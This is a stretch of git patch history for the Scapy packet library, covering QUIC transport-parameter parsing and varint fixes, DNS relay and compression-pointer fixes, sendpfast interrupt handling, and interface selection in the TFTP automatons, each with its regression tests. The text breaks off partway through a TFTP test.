QUIC_TP_InitialSourceConnectionId, + 0x10: QUIC_TP_RetrySourceConnectionId, +} + + +class _QuicTransportParametersField(PacketListField): + _varfield = QuicVarIntField("", 0) + + def __init__(self, name, default, **kwargs): + kwargs["next_cls_cb"] = self.cls_from_quictptype + super(_QuicTransportParametersField, self).__init__( + name, + default, + **kwargs, + ) + + @classmethod + def cls_from_quictptype(cls, pkt, lst, cur, remain): + _, typ = cls._varfield.getfield(None, remain) + return _QUIC_TP_cls.get( + typ, + QUIC_TP_Unknown, + ) diff --git a/test/scapy/layers/quic.uts b/test/scapy/layers/quic.uts new file mode 100644 index 00000000000..b868a6fc848 --- /dev/null +++ b/test/scapy/layers/quic.uts @@ -0,0 +1,50 @@ +% Scapy QUIC layer tests + ++ QUIC dissection / build + +% We use the examples from https://quic.xargs.org/. Big props & kudos to them ! +% FIXME TODO: THIS IS VERY INCOMPLETE. + += QUIC - Dissect Client Initial Packet + +from scapy.layers.quic import * + +pkt = QUIC(bytes.fromhex("c00000000108000102030405060705635f636964004103001c36a7ed78716be9711ba498b7ed868443bb2e0c514d4d848eadcc7a00d25ce9f9afa483978088de836be68c0b32a24595d7813ea5414a9199329a6d9f7f760dd8bb249bf3f53d9a77fbb7b395b8d66d7879a51fe59ef9601f79998eb3568e1fdc789f640acab3858a82ef2930fa5ce14b5b9ea0bdb29f4572da85aa3def39b7efafffa074b9267070d50b5d07842e49bba3bc787ff295d6ae3b514305f102afe5a047b3fb4c99eb92a274d244d60492c0e2e6e212cef0f9e3f62efd0955e71c768aa6bb3cd80bbb3755c8b7ebee32712f40f2245119487021b4b84e1565e3ca31967ac8604d4032170dec280aeefa095d08b3b7241ef6646a6c86e5c62ce08be099")) +assert QUIC_Initial in pkt +assert pkt.LongPacketType == 0 +assert pkt.DstConnID == b"\x00\x01\x02\x03\x04\x05\x06\x07" +assert pkt.SrcConnID == b"c_cid" +assert pkt.Length == 259 +assert len(pkt.load) + 1 == 259 +assert pkt.PacketNumber == 0 + += QUIC - Dissect Server Initial Packet + +from scapy.layers.quic import * + +pkt = QUIC(bytes.fromhex("c00000000105635f63696405735f63696400407500836855d5d9c823d07c616882ca770279249864b556e51632257e2d8ab1fd0dc04b18b9203fb919d8ef5a33f378a627db674d3c7fce6ca5bb3e8cf90109cbb955665fc1a4b93d05f6eb83252f6631bcadc7402c10f65c52ed15b4429c9f64d84d64fa406cf0b517a926d62a54a9294136b143b033")) +assert QUIC_Initial in pkt +assert pkt.LongPacketType == 0 +assert pkt.DstConnID == b"c_cid" +assert pkt.SrcConnID == b"s_cid" +assert pkt.Length == 117 +assert len(pkt.load) + 1 == 117 +assert pkt.PacketNumber == 0 + += QUIC - Dissect Server Handshake Packet + +from scapy.layers.quic import * + +pkt = QUIC(bytes.fromhex("e00000000105635f63696405735f63696440cf014420f919681c3f0f102a30f5e647a3399abf54bc8e80453134996ba33099056242f3b8e662bbfce42f3ef2b6ba87159147489f8479e849284e983fd905320a62fc7d67e9587797096ca60101d0b2685d8747811178133ad9172b7ff8ea83fd81a814bae27b953a97d57ebff4b4710dba8df82a6b49d7d7fa3d8179cbdb8683d4bfa832645401e5a56a76535f71c6fb3e616c241bb1f43bc147c296f591402997ed49aa0c55e31721d03e14114af2dc458ae03944de5126fe08d66a6ef3ba2ed1025f98fea6d6024998184687dc06")) +assert QUIC_Handshake in pkt +assert pkt.LongPacketType == 2 +assert pkt.DstConnID == b"c_cid" +assert pkt.SrcConnID == b"s_cid" +assert pkt.PacketNumber == 1 + += QUIC - Build Client Initial Packet + +from scapy.layers.quic import * + +pkt = QUIC_Initial(PacketNumberLen=3, DstConnID=b'p\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR', SrcConnID=b'\xf7\x10Q', PacketNumber=116) +assert bytes(pkt) == b'\xc3\x00\x00\x00\x01\x0fp\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR\x0f\xf7\x10Q\x00\x00t' diff --git a/test/scapy/layers/tls/tls13.uts b/test/scapy/layers/tls/tls13.uts index 12d58560874..130723c1998 100644 --- a/test/scapy/layers/tls/tls13.uts +++ b/test/scapy/layers/tls/tls13.uts @@ -1,7 +1,7 @@ % Tests for TLS 1.3 # # Try me with : -# bash test/run_tests -t test/tls13.uts -F +# bash test/run_tests -t test/scapy/layers/tls/tls13.uts -F ~ libressl @@ -1221,3 +1221,89 @@ ch = TLS(b'\x16\x03\x01\x01\x1a\x01\x00\x01\x16\x03\x03\xec\x9c>\xb2\x9e|B\x05\x assert isinstance(ch.msg[0].ext[9], TLS_Ext_PreSharedKey_CH) assert ch.msg[0].ext[9].identities[0].identity.load == b'Client_identity' assert ch.msg[0].ext[9].identities[0].obfuscated_ticket_age == 0 + ++ QUIC Transport Parameters + += QUIC Transport Parameters - Parse hex stream +~ quic + +from scapy.layers.tls.quic import * +from scapy.layers.tls.all import TLS13ClientHello, TLS_Ext_QUICTransportParameters + +ch_data = bytes.fromhex("010001e403034f417babafc5dc240c744225bb09b0c5067618b7501ef4bf7ea73c64249e5d0c000006130213011303010001b50033010c010a00170041048497f2dd89fb1d341b02894edd154ebd5ee5e55594d7935d99d2c05733991cccc9af02200e53bcc80208fa1498c5c88ccf643d598cb05c5fde37a1e468cd593200180061045bff37b0fde67fcfc50b7ab6eb139f51998bdb859632138b30caf96882ef871b27aaf534cce0dcfa157be21343fd6b0db5cc306564f19c46d3c9e175e3dbbb594fe7c393e35de695fc84f64ec4a59ee3cea26a0599a61d6dfc18568fb5c0cb85001d00205af975b0ec59288a578c94890d3264f9ac025ab86f7cd718112da6b923b2e54d001e0038f989efd52e4e8ab64491bfd8b8d30481d854b9394f517148dc8d5a50a43ebbdcca6e4b27229acd2f20b6633632d32e9be6999a40d30561e2002b0003020304000d00140012040308040401050308050501020108070808000a000a000800170018001d001e002d000201010000000e000c00000968332d7365727665720010000500030268330039005301048000ea600404801000000508c0000001000000000608c0000001000000000708c00000010000000008024080090240800a01030b01190e01080f087f317d3033e6423e110c00000001000000016b3343cf") + +ch = TLS13ClientHello(ch_data) +tp = ch.ext[-1] +assert isinstance(tp, TLS_Ext_QUICTransportParameters) +assert isinstance(tp.params[0], QUIC_TP_MaxIdleTimeout) +assert tp.params[0].value == 60000 +assert isinstance(tp.params[1], QUIC_TP_InitialMaxData) +assert tp.params[1].value == 1048576 +assert isinstance(tp.params[2], QUIC_TP_InitialMaxStreamDataBidiLocal) +assert tp.params[2].value == 4294967296 +assert isinstance(tp.params[3], QUIC_TP_InitialMaxStreamDataBidiRemote) +assert tp.params[3].value == 4294967296 +assert isinstance(tp.params[4], QUIC_TP_InitialMaxStreamDataUni) +assert tp.params[4].value == 4294967296 +assert isinstance(tp.params[5], QUIC_TP_InitialMaxStreamsBidi) +assert tp.params[5].value == 128 +assert isinstance(tp.params[6], QUIC_TP_InitialMaxStreamsUni) +assert tp.params[6].value == 128 +assert isinstance(tp.params[7], QUIC_TP_AckDelayExponent) +assert tp.params[7].value == 3 +assert isinstance(tp.params[8], QUIC_TP_MaxAckDelay) +assert tp.params[8].value == 25 +assert isinstance(tp.params[9], QUIC_TP_ActiveConnectionIdLimit) +assert tp.params[9].value == 8 +assert isinstance(tp.params[10], QUIC_TP_InitialSourceConnectionId) +assert tp.params[10].value == bytes.fromhex("7f317d3033e6423e") + += QUIC Transport Parameters - Build packet +~ quic + +from scapy.layers.tls.quic import * +from scapy.layers.tls.all import TLS_Ext_QUICTransportParameters + +tp = TLS_Ext_QUICTransportParameters(params=[ + QUIC_TP_MaxIdleTimeout(value=5000), + QUIC_TP_MaxUdpPayloadSize(value=1350), + QUIC_TP_InitialMaxData(value=10000000), + QUIC_TP_InitialMaxStreamDataBidiLocal(value=1000000), + QUIC_TP_InitialMaxStreamDataBidiRemote(value=1000000), + QUIC_TP_InitialMaxStreamDataUni(value=1000000), + QUIC_TP_InitialMaxStreamsBidi(value=100), + QUIC_TP_InitialMaxStreamsUni(value=100), + QUIC_TP_AckDelayExponent(value=3), + QUIC_TP_MaxAckDelay(value=25), + QUIC_TP_DisableActiveMigration(), + QUIC_TP_InitialSourceConnectionId(value=bytes.fromhex("2173071905d778f98e367b8ad8eeb526484e8f5d")), +]) +actual = tp.build() + +# the expected data is extracted from the ClientHello above +expect = bytes.fromhex("0039004601015388030145460401409896800501400f42400601400f42400701400f424008014064090140640a01030b01190c000f142173071905d778f98e367b8ad8eeb526484e8f5d") + +assert actual == expect + += QUIC Transport Parameters - Build empty packet +~ quic + +from scapy.layers.tls.all import TLS_Ext_QUICTransportParameters + +p = TLS_Ext_QUICTransportParameters(params=[]) +actual = p.build() + +assert actual == b'\x009\x00\x00' + += QUIC Transport Parameters - Throw error if value is a big integer +~ quic + +from scapy.layers.tls.quic import QUIC_TP_InitialMaxData + +# A 62-bit left shift results in an integer of 63 bits +p = QUIC_TP_InitialMaxData(value=1<<62) +try: + p.build() + assert False, "QUIC cannot decode integers with more than 62 bits" +except struct.error: + pass From 874abdccae659f2b038d25ce498bed2b19b2fb4d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 9 Mar 2025 16:37:38 +0100 Subject: [PATCH 1446/1632] QUIC: fix small bugs in size calculation (#4685) --- scapy/layers/quic.py | 40 ++++++++++++++---- test/scapy/layers/quic.uts | 73 +++++++++++++++++++++++++++++++-- test/scapy/layers/tls/tls13.uts | 2 +- 3 files changed, 104 insertions(+), 11 deletions(-) diff --git a/scapy/layers/quic.py b/scapy/layers/quic.py index 7252128c593..03d2b25ec94 100644 --- a/scapy/layers/quic.py +++ b/scapy/layers/quic.py @@ -35,6 +35,7 @@ MultipleTypeField, ShortField, StrLenField, + ThreeBytesField, ) # Typing imports @@ -80,9 +81,9 @@ def addfield(self, pkt: Packet, s: bytes, val: Optional[int]): elif val < 0x4000: return s + struct.pack("!H", val | 0x4000) elif val < 0x40000000: - return s + struct.pack("!I", val | 0x40000000) + return s + struct.pack("!I", val | 0x80000000) else: - return s + struct.pack("!Q", val | 0x4000000000000000) + return s + struct.pack("!Q", val | 0xC000000000000000) def getfield(self, pkt: Packet, s: bytes) -> Tuple[bytes, int]: length = (s[0] & 0xC0) >> 6 @@ -185,7 +186,7 @@ class QUIC_Version(QUIC): IntField("Version", 0), FieldLenField("DstConnIDLen", None, length_of="DstConnID", fmt="B"), StrLenField("DstConnID", "", length_from=lambda pkt: pkt.DstConnIDLen), - FieldLenField("SrcConnIDLen", None, length_of="DstConnID", fmt="B"), + FieldLenField("SrcConnIDLen", None, length_of="SrcConnID", fmt="B"), StrLenField("SrcConnID", "", length_from=lambda pkt: pkt.SrcConnIDLen), FieldListField("SupportedVersions", [], IntField("", 0)), ] @@ -195,9 +196,34 @@ class QUIC_Version(QUIC): QuicPacketNumberField = lambda name, default: MultipleTypeField( [ - (ByteField(name, default), lambda pkt: pkt.PacketNumberLen == 0), - (ShortField(name, default), lambda pkt: pkt.PacketNumberLen == 1), - (IntField(name, default), lambda pkt: pkt.PacketNumberLen == 2), + ( + ByteField(name, default), + ( + lambda pkt: pkt.PacketNumberLen == 0, + lambda _, val: val < 0x100, + ), + ), + ( + ShortField(name, default), + ( + lambda pkt: pkt.PacketNumberLen == 1, + lambda _, val: val < 0x10000, + ), + ), + ( + ThreeBytesField(name, default), + ( + lambda pkt: pkt.PacketNumberLen == 2, + lambda _, val: val < 0x1000000, + ), + ), + ( + IntField(name, default), + ( + lambda pkt: pkt.PacketNumberLen == 3, + lambda _, val: val < 0x100000000, + ), + ), ], ByteField(name, default), ) @@ -213,7 +239,7 @@ def i2m(self, pkt, x): return 0 elif PacketNumber < 0x10000: return 1 - elif PacketNumber < 0x100000000: + elif PacketNumber < 0x1000000: return 2 else: return 3 diff --git a/test/scapy/layers/quic.uts b/test/scapy/layers/quic.uts index b868a6fc848..4e66957ee0a 100644 --- a/test/scapy/layers/quic.uts +++ b/test/scapy/layers/quic.uts @@ -42,9 +42,76 @@ assert pkt.DstConnID == b"c_cid" assert pkt.SrcConnID == b"s_cid" assert pkt.PacketNumber == 1 -= QUIC - Build Client Initial Packet += QUIC - QuicPacketNumberField / QuicPacketNumberBitFieldLenField - variable lengths from scapy.layers.quic import * -pkt = QUIC_Initial(PacketNumberLen=3, DstConnID=b'p\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR', SrcConnID=b'\xf7\x10Q', PacketNumber=116) -assert bytes(pkt) == b'\xc3\x00\x00\x00\x01\x0fp\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR\x0f\xf7\x10Q\x00\x00t' +pkt = QUIC_Initial(DstConnID=b'p\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR', SrcConnID=b'\xf7\x10Q', PacketNumber=0xFF) +assert bytes(pkt) == b'\xc0\x00\x00\x00\x01\x0fp\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR\x03\xf7\x10Q\x00\x00\xff' +pkt = QUIC_Initial(bytes(pkt)) +assert pkt.DstConnIDLen == 15 +assert pkt.SrcConnIDLen == 3 +assert pkt.PacketNumberLen == 0 +assert pkt.PacketNumber == 0xFF + +pkt = QUIC_Initial(DstConnID=b'p\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR', SrcConnID=b'\xf7\x10Q', PacketNumber=0xFFFF) +assert bytes(pkt) == b'\xc1\x00\x00\x00\x01\x0fp\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR\x03\xf7\x10Q\x00\x00\xff\xff' +pkt = QUIC_Initial(bytes(pkt)) +assert pkt.PacketNumberLen == 1 +assert pkt.PacketNumber == 0xFFFF + +pkt = QUIC_Initial(DstConnID=b'p\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR', SrcConnID=b'\xf7\x10Q', PacketNumber=0xFFFFFF) +assert bytes(pkt) == b'\xc2\x00\x00\x00\x01\x0fp\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR\x03\xf7\x10Q\x00\x00\xff\xff\xff' +pkt = QUIC_Initial(bytes(pkt)) +assert pkt.PacketNumberLen == 2 +assert pkt.PacketNumber == 0xFFFFFF + +pkt = QUIC_Initial(DstConnID=b'p\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR', SrcConnID=b'\xf7\x10Q', PacketNumber=0xFFFFFFFF) +assert bytes(pkt) == b'\xc3\x00\x00\x00\x01\x0fp\xa2\x8e@\x96\xc5}\xd0\xff\xb6\xc3\xd8\x1b\xcaR\x03\xf7\x10Q\x00\x00\xff\xff\xff\xff' +pkt = QUIC_Initial(bytes(pkt)) +assert pkt.PacketNumberLen == 3 +assert pkt.PacketNumber == 0xFFFFFFFF + += QUIC - QuicPacketNumberField / QuicPacketNumberBitFieldLenField - Out of range + +import struct +from scapy.layers.quic import * + +try: + pkt = QUIC_Initial(PacketNumber=0xFFFFFFFFFF) + bytes(pkt) + assert False, "QUIC Packet Number length should fail" +except struct.error: + pass + += QUIC - QuicVarIntField - variable lengths + +from scapy.layers.quic import * + +pkt = QUIC_Initial(Length=1) +assert bytes(pkt) == b'\xc0\x00\x00\x00\x01\x00\x00\x00\x01\x00' +assert QUIC_Initial(bytes(pkt)).Length == 1 + +pkt = QUIC_Initial(Length=1 << 9) +assert bytes(pkt) == b'\xc0\x00\x00\x00\x01\x00\x00\x00B\x00\x00' +assert QUIC_Initial(bytes(pkt)).Length == 1 << 9 + +pkt = QUIC_Initial(Length=1 << 17) +assert bytes(pkt) == b'\xc0\x00\x00\x00\x01\x00\x00\x00\x80\x02\x00\x00\x00' +assert QUIC_Initial(bytes(pkt)).Length == 1 << 17 + +pkt = QUIC_Initial(Length=4611686018427387903) +assert bytes(pkt) == b'\xc0\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00' +assert QUIC_Initial(bytes(pkt)).Length == 4611686018427387903 + += QUIC - QuicVarIntField - Out of range + +import struct +from scapy.layers.quic import * + +try: + pkt = QUIC_Initial(Length=0xFFFFFFFFFFFFFFFF) + bytes(pkt) + assert False, "QUIC Variable length should fail" +except struct.error: + pass diff --git a/test/scapy/layers/tls/tls13.uts b/test/scapy/layers/tls/tls13.uts index 130723c1998..7a525ef1090 100644 --- a/test/scapy/layers/tls/tls13.uts +++ b/test/scapy/layers/tls/tls13.uts @@ -1281,7 +1281,7 @@ tp = TLS_Ext_QUICTransportParameters(params=[ actual = tp.build() # the expected data is extracted from the ClientHello above -expect = bytes.fromhex("0039004601015388030145460401409896800501400f42400601400f42400701400f424008014064090140640a01030b01190c000f142173071905d778f98e367b8ad8eeb526484e8f5d") +expect = bytes.fromhex("0039004601015388030145460401809896800501800f42400601800f42400701800f424008014064090140640a01030b01190c000f142173071905d778f98e367b8ad8eeb526484e8f5d") assert actual == expect From 494e47275c8d5d76db127ce9eae79d00b438aa2b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 10 Mar 2025 17:48:49 +0100 Subject: [PATCH 1447/1632] DNS 'relay' mode: include aditional records (#4687) --- scapy/layers/dns.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index e1111eda828..ef6b1f78961 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1822,9 +1822,10 @@ def make_reply(self, req): if self.relay: # Relay mode ? try: - _rslv = dns_resolve(rq.qname, qtype=rq.qtype) + _rslv = dns_resolve(rq.qname, qtype=rq.qtype, raw=True) if _rslv: - ans.extend(_rslv) + ans.extend(_rslv.an) + ars.extend(_rslv.ar) continue # next except TimeoutError: pass From a4f958be0ad2c18bfa019cbd062839cb3cf2e6b0 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 10 Mar 2025 22:14:34 +0100 Subject: [PATCH 1448/1632] Fix bug if DNS compression gives an offset of exactly 46 (#4688) * Remove orb() usage * Fix bug if DNS pointer was exactly 46 --- scapy/layers/dns.py | 21 ++++++++++++--------- test/scapy/layers/dns.uts | 10 +++++++++- 2 files changed, 21 insertions(+), 10 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index ef6b1f78961..3a88a09ba38 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -29,7 +29,7 @@ from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Net, ScopedIP from scapy.config import conf -from scapy.compat import orb, raw, chb, bytes_encode, plain_str +from scapy.compat import raw, chb, bytes_encode, plain_str from scapy.error import log_runtime, warning, Scapy_Exception from scapy.packet import Packet, bind_layers, Raw from scapy.fields import ( @@ -199,9 +199,12 @@ def dns_get_str(s, full=None, _ignore_compression=False): def _is_ptr(x): - return b"." not in x and ( - (x and orb(x[-1]) == 0) or - (len(x) >= 2 and (orb(x[-2]) & 0xc0) == 0xc0) + """ + Heuristic to guess if bytes are an encoded DNS pointer. + """ + return ( + (x and x[-1] == 0) or + (len(x) >= 2 and (x[-2] & 0xc0) == 0xc0) ) @@ -396,7 +399,7 @@ def m2i(self, pkt, s): # RDATA contains a list of strings, each are prepended with # a byte containing the size of the following string. while tmp_s: - tmp_len = orb(tmp_s[0]) + 1 + tmp_len = tmp_s[0] + 1 if tmp_len > len(tmp_s): log_runtime.info( "DNS RR TXT prematured end of character-string " @@ -559,7 +562,7 @@ def _pack_subnet(self, subnet): # type: (bytes) -> bytes packed_subnet = inet_pton(self.af_familly, plain_str(subnet)) for i in list(range(operator.floordiv(self.af_length, 8)))[::-1]: - if orb(packed_subnet[i]) != 0: + if packed_subnet[i] != 0: i += 1 break return packed_subnet[:i] @@ -699,9 +702,9 @@ def bitmap2RRlist(bitmap): log_runtime.info("bitmap too short (%i)", len(bitmap)) return - window_block = orb(bitmap[0]) # window number + window_block = bitmap[0] # window number offset = 256 * window_block # offset of the Resource Record - bitmap_len = orb(bitmap[1]) # length of the bitmap in bytes + bitmap_len = bitmap[1] # length of the bitmap in bytes if bitmap_len <= 0 or bitmap_len > 32: log_runtime.info("bitmap length is no valid (%i)", bitmap_len) @@ -713,7 +716,7 @@ def bitmap2RRlist(bitmap): for b in range(len(tmp_bitmap)): v = 128 for i in range(8): - if orb(tmp_bitmap[b]) & v: + if tmp_bitmap[b] & v: # each of the RR is encoded as a bit RRlist += [offset + b * 8 + i] v = v >> 1 diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 88d7652768c..6496d6e4a82 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -440,7 +440,15 @@ data = b'\xac\x81\x81\x80\x00\x01\x00\x06\x00\r\x00\x00\x04mqtt\x0bweatherflow\x p = DNS(data) cmp = p.compress() -assert len(cmp) == len(data) +assert bytes(cmp) == data + += DNS - dns_compress with pointer b'\xc0.' + +data = b'\x00\x02\x81\x00\x00\x01\x00\x03\x00\x00\x00\x00\x05forms\x06office\x03com\x00\x00\x01\x00\x01\xc0\x0c\x00\x05\x00\x01\x00\x00\x01\x1b\x00&\x05forms\x06office\x03com\x06b-0039\x08b-msedge\x03net\x00\xc0.\x00\x05\x00\x01\x00\x00\x00\xdf\x00\x02\xc0?\xc0?\x00\x01\x00\x01\x00\x00\x00\xdf\x00\x04\rk\x06\xc2' + +p = DNS(data) +cmp = p.compress() +assert bytes(cmp) == data = DNS - dns_encode edge cases From 4d499c280d7b9edce1e5f40457a02ac45e862a41 Mon Sep 17 00:00:00 2001 From: BadCodeBuilder <38467722+badcodebuilder@users.noreply.github.com> Date: Mon, 24 Mar 2025 09:01:38 +0800 Subject: [PATCH 1449/1632] Fix sendpfast cancellation via Ctrl+C (#4690) (#4691) * Fix bugs if stopping sendpfast via Ctrl+C --- scapy/sendrecv.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 07fa4fc0062..b742d1751d8 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -585,12 +585,15 @@ def sendpfast(x: _PacketIterable, try: cmd = subprocess.Popen(argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + cmd.wait() except KeyboardInterrupt: + if cmd: + cmd.terminate() log_interactive.info("Interrupted by user") except Exception: os.unlink(f) raise - else: + finally: stdout, stderr = cmd.communicate() if stderr: log_runtime.warning(stderr.decode()) From 9e4dc1d0190d5412c5aa175530a05cecaaf508d1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 24 Mar 2025 10:49:53 +0100 Subject: [PATCH 1450/1632] Select interface in TFTP automatons (#4684) * Select interface in TFTP automatons * Add TFTP docstrings * Merge the 2 tftp.uts --- scapy/layers/tftp.py | 53 ++++++++++- test/scapy/layers/tftp.uts | 178 ++++++++++++++++++++++++++++++++++++- test/tftp.uts | 174 ------------------------------------ 3 files changed, 224 insertions(+), 181 deletions(-) delete mode 100644 test/tftp.uts diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index 742a5a89559..e4034b51f7b 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -5,19 +5,30 @@ """ TFTP (Trivial File Transfer Protocol). + +This provides TFTP implementation and 4 small automata: + - TFTP_read: read a remote file + - TFTP_RRQ_server: server that answers to read requests + - TFTP_write: write a remote file + - TFTP_WRQ_server: server than accepts write requests """ import os import random from scapy.packet import Packet, bind_layers, split_bottom_up, bind_bottom_up -from scapy.fields import PacketListField, ShortEnumField, ShortField, \ - StrNullField +from scapy.fields import ( + PacketListField, + ShortEnumField, + ShortField, + StrNullField, +) from scapy.automaton import ATMT, Automaton -from scapy.layers.inet import UDP, IP +from scapy.base_classes import Net from scapy.config import conf from scapy.volatile import RandShort +from scapy.layers.inet import UDP, IP TFTP_operations = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR", 6: "OACK"} # noqa: E501 @@ -138,9 +149,17 @@ def answers(self, other): class TFTP_read(Automaton): """ TFTP automaton to read a remote file on a TFTP server. + + :param filename: the name of the remote file to read. + :param server: the host on which to read (IP or name). + :param sport: (optional) the source port to use. (default: random) + :param port: (optional) the TFTP port (default: 69) """ def parse_args(self, filename, server, sport=None, port=69, **kargs): + if "iface" not in kargs: + server = str(Net(server)) + kargs["iface"] = conf.route.route(server)[0] Automaton.parse_args(self, **kargs) self.filename = filename self.server = server @@ -229,9 +248,18 @@ def END(self): class TFTP_write(Automaton): """ TFTP automaton to write a local file onto a TFTP server. + + :param filename: the name of the remote file to write. + :param data: the bytes data to write. + :param server: the host on which to read (IP or name). + :param sport: (optional) the source port to use. (default: random) + :param port: (optional) the TFTP port (default: 69) """ def parse_args(self, filename, data, server, sport=None, port=69, **kargs): + if "iface" not in kargs: + server = str(Net(server)) + kargs["iface"] = conf.route.route(server)[0] Automaton.parse_args(self, **kargs) self.filename = filename self.server = server @@ -313,9 +341,15 @@ def END(self): class TFTP_WRQ_server(Automaton): """ TFTP automaton to wait for incoming files + + :param ip: (optional) the local IP to listen on. + :param sport: (optional) the local port (by default: random) """ def parse_args(self, ip=None, sport=None, *args, **kargs): + if "iface" not in kargs: + ip = str(Net(ip)) + kargs["iface"] = conf.route.route(ip)[0] Automaton.parse_args(self, *args, **kargs) self.ip = ip self.sport = sport @@ -393,9 +427,22 @@ def END(self): class TFTP_RRQ_server(Automaton): """ TFTP automaton to serve local files + + You can't use 'store' and 'dir' at the same time. + + :param store: (optional) a dictionary that contains the file data, like + {"thefile": b"data"}. + :param dir: (optional) a folder that contains the data file data. + :param joker: (optional) data to return when no file/data is found. + :param ip: (optional) the local IP to listen on. + :param sport: (optional) the local port (by default: random) + :param serve_one: (optional) close after serving one client (default: False) """ def parse_args(self, store=None, joker=None, dir=None, ip=None, sport=None, serve_one=False, **kargs): # noqa: E501 + if "iface" not in kargs: + ip = str(Net(ip)) + kargs["iface"] = conf.route.route(ip)[0] Automaton.parse_args(self, **kargs) if store is None: store = {} diff --git a/test/scapy/layers/tftp.uts b/test/scapy/layers/tftp.uts index f4ec15b8169..eac31201629 100644 --- a/test/scapy/layers/tftp.uts +++ b/test/scapy/layers/tftp.uts @@ -1,16 +1,186 @@ -% TFTP regression tests for Scapy +% Regression tests for TFTP # More information at http://www.secdev.org/projects/UTscapy/ ++ TFTP coverage tests -############ -############ -+ TFTP tests += Test answers + +assert TFTP_DATA(block=1).answers(TFTP_RRQ()) +assert not TFTP_WRQ().answers(TFTP_RRQ()) +assert not TFTP_RRQ().answers(TFTP_WRQ()) +assert TFTP_ACK(block=1).answers(TFTP_DATA(block=1)) +assert not TFTP_ACK(block=0).answers(TFTP_DATA(block=1)) +assert TFTP_ACK(block=0).answers(TFTP_RRQ()) +assert not TFTP_ACK().answers(TFTP_ACK()) +assert TFTP_ERROR().answers(TFTP_DATA()) and TFTP_ERROR().answers(TFTP_ACK()) +assert TFTP_OACK().answers(TFTP_WRQ()) = TFTP Options + x=IP()/UDP(sport=12345)/TFTP()/TFTP_RRQ(filename="fname")/TFTP_Options(options=[TFTP_Option(oname="blksize", value="8192"),TFTP_Option(oname="other", value="othervalue")]) assert raw(x) == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x0109\x00E\x004B6\x00\x01fname\x00octet\x00blksize\x008192\x00other\x00othervalue\x00' y=IP(raw(x)) y[TFTP_Option].oname y[TFTP_Option:2].oname assert len(y[TFTP_Options].options) == 2 and y[TFTP_Option].oname == b"blksize" + + ++ TFTP Automatons +~ linux + += Utilities +~ linux + +from scapy.automaton import select_objects + +class MockTFTPSocket(object): + packets = [] + def __init__(self, iface): + self.iface = iface + def recv(self, n=None): + pkt = self.packets.pop(0) + return pkt + def send(self, *args, **kargs): + pass + def close(self): + pass + @classmethod + def select(classname, inputs, remain): + test = [s for s in inputs if isinstance(s, classname)] + if test: + if len(test[0].packets): + return test + else: + inputs = [s for s in inputs if not isinstance(s, classname)] + return select_objects(inputs, remain) + + += TFTP_read() automaton +~ linux + +class MockReadSocket(MockTFTPSocket): + packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_DATA(block=1) / ("P" * 512), + IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_DATA(block=2) / "<3"] + +tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, + ll=MockReadSocket, + recvsock=MockReadSocket, debug=5) + +res = tftp_read.run() +assert res == (b"P" * 512 + b"<3") + += TFTP_read() automaton error +~ linux + +class MockReadSocket(MockTFTPSocket): + packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] + +tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, + ll=MockReadSocket, + recvsock=MockReadSocket) + +try: + tftp_read.run() + assert False +except Automaton.ErrorState as e: + assert "Reached ERROR" in str(e) + assert "ERROR Access violation" in str(e) + + += TFTP_write() automaton +~ linux + +data_received = b"" + +class MockWriteSocket(MockTFTPSocket): + packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ACK(block=0), + IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ACK(block=1) ] + def send(self, *args, **kargs): + if len(args) and Raw in args[0]: + global data_received + data_received += args[0][Raw].load + +tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2807, + ll=MockWriteSocket, + recvsock=MockWriteSocket) + +tftp_write.run() +assert data_received == 